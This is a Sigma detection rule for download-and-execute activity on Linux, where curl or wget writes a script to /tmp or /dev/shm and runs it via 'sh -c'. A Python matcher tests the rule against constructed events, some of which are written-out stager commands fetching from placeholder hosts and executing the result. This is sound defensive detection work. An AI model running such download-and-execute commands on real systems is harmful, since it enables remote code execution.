Techniques
Sample rules
Suspicious Download and Execute Pattern via Curl/Wget
- source: sigma
- techniques:
- t1059
- t1059.004
- t1203
Description
Detects suspicious use of command-line tools such as curl or wget to download remote content - particularly scripts - into temporary directories (e.g., /dev/shm, /tmp), followed by immediate execution, indicating potential malicious activity. This pattern is commonly used by malicious scripts, stagers, or downloaders in fileless or multi-stage Linux attacks.
Detection logic
selection_downloader:
    CommandLine|contains:
        - '/curl'
        - '/wget'
selection_executor:
    CommandLine|contains: 'sh -c'
selection_tmp:
    CommandLine|contains:
        - '/tmp/'
        - '/dev/shm/'
condition: all of selection_*
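The three selections and the `all of selection_*` condition as a stand-alone matcher run over constructed process-creation events (an added example, not code from the Sigma rule or its repository; the event names and command lines are made up, and Sigma's default case-insensitive string matching is assumed):

```python
"""Stand-alone matcher for the rule's selections over a process CommandLine."""

# Terms copied from the rule above. Sigma string matching is case-insensitive
# by default, so every comparison below lowercases both sides.
DOWNLOADER_TERMS = ("/curl", "/wget")
EXECUTOR_TERMS = ("sh -c",)
TMP_TERMS = ("/tmp/", "/dev/shm/")


def _contains_any(command_line: str, terms: tuple) -> bool:
    """CommandLine|contains with a list value: any single term is enough."""
    lowered = command_line.lower()
    return any(term.lower() in lowered for term in terms)


def matches_rule(command_line: str) -> bool:
    """condition: all of selection_* -- every selection group must match."""
    return (
        _contains_any(command_line, DOWNLOADER_TERMS)
        and _contains_any(command_line, EXECUTOR_TERMS)
        and _contains_any(command_line, TMP_TERMS)
    )


def triage(events: list) -> list:
    """Return the names of the events whose CommandLine matches the rule."""
    return [e["name"] for e in events if matches_rule(e["CommandLine"])]


# Constructed sample events (not real telemetry). Note two properties of the
# rule as written: '/curl' only matches the binary invoked by path, so a bare
# 'curl' is not covered by selection_downloader, and 'bash -c' also satisfies
# 'sh -c' because the latter is a substring of the former.
SAMPLE_EVENTS = [
    {"name": "stager",
     "CommandLine": 'bash -c "/usr/bin/curl -s http://example.invalid/x.sh '
                    '-o /dev/shm/x.sh && sh /dev/shm/x.sh"'},
    {"name": "wget_upper",
     "CommandLine": 'SH -C "/usr/bin/WGET -q http://example.invalid/a -O /tmp/a; /tmp/a"'},
    {"name": "download_only",
     "CommandLine": "/usr/bin/curl -fsSL https://example.invalid/f -o /tmp/f"},
    {"name": "shell_only",
     "CommandLine": 'sh -c "ls -la /tmp/"'},
    {"name": "bare_curl",
     "CommandLine": 'sh -c "curl -o /tmp/x http://example.invalid/x"'},
]

if __name__ == "__main__":
    print(triage(SAMPLE_EVENTS))  # prints ['stager', 'wget_upper']
```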